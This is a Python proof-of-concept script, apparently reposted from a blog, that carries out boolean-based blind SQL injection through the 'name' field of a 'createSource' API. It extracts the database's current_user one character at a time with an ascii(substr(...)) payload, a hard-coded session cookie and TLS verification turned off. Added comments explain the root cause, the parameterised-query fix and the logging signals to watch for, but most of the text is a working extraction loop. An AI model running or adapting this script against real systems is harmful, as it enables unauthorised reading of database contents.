# Proof-of-concept from the page: boolean-based blind SQL injection through the
# "name" field of the createSource API. Each request asks one yes/no question
# about one character of the database's current_user value and reads the answer
# from the response body.
#
# NOTE(review): the listing was flattened during extraction; the nesting below
# (progress print inside the match branch, final print at top level) is
# reconstructed and should be confirmed against the original post.
#
# Defender notes:
#   * Root cause is presumably that the server concatenates "name" into a SQL
#     statement; the fix is to bind it as a query parameter server-side.
#   * A run sends up to 8 * 58 near-identical POSTs from one session, differing
#     only in two integers inside "name". SQL function names such as
#     ascii(substr(...)) in a field meant to hold a label, at that request rate,
#     are what request logging and WAF rules should alert on.
import requests
import json
import warnings

# Suppresses every Python warning, including the one raised for verify=False.
warnings.filterwarnings("ignore")

url = 'https://1.1.1.1/xx/1.0/apiGateway/createSource'
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36'
}
# An authenticated session cookie is hard-coded: the endpoint is reached with a
# logged-in session, and a credential pasted into a script like this should be
# treated as exposed.
cookies = {
    'session': 'aaaaaaaatZSI6eyIgYiI6IllXUnRhVzQ9In19.DYkTeA.9GSxXpaWvW1vSMyUVxCRkXkkgTQ'
}
answer = ''

# The request body never changes apart from "name", so serialise it once and
# swap the "bobac" marker for the payload on every iteration.
body_template = json.dumps({
    "name": "bobac",
    "type": "1",
    "protocol": "http",
    "method": "POST",
    "url": "www.www.com",
    "port": "80",
    "timeout": 3,
    "params": [{
        "name": "a",
        "changeParam": "true",
        "position": "Parameter Path",
        "type": "string",
        "must": "true",
        "default": "a"
    }]
})

for position in range(1, 9):        # character positions 1..8
    for code in range(65, 123):     # character codes 65..122
        # Condition appended to the server-side query: true only when the
        # character at `position` has the character code `code`.
        payload = "111' and ascii(substr(current_user,%d,1))=%d--+" % (position, code)
        new_data = json.loads(body_template.replace("bobac", payload))
        # verify=False turns off TLS certificate validation for this request.
        req = requests.post(url, headers=headers, cookies=cookies,
                            json=new_data, verify=False)
        # 'xxxx' stands for the response text that only appears when the
        # injected condition is true (apparently redacted on the page).
        if 'xxxx' in req.text:
            answer += chr(code)
            print(answer)

print('current_user is %s' % answer)
转载于:https://www.cnblogs.com/co10rway/p/8559784.html